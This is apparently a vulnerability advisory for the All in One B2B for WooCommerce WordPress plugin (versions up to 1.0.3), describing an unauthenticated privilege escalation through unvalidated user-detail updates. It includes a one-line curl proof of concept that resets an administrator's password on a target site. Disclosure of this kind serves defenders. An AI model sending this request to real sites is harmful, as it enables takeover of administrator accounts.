WordPress Plugin Vulnerabilities
All in One B2B for WooCommerce <= 1.0.3 - Unauthenticated Privilege Escalation
Description
The plugin does not properly validate parameters when updating user details, allowing an unauthenticated attacker to update the details of any user. Updating the password of an Admin user leads to privilege escalation.
Proof of Concept
curl 'https://example.com/' -d 'action=save_customer_details&customer_id=ADMIN_USER_ID&customer_password=NEW_PASSWORD&customer_email=ADMIN_EMAIL&customer_display_name=Foo'
Affects Plugins
References
CVE
Classification
Type
PRIVESC
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Alexander Concha
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-04 (about 2 months ago)
Added
2023-09-04 (about 2 months ago)
Last Updated
2023-09-04 (about 2 months ago)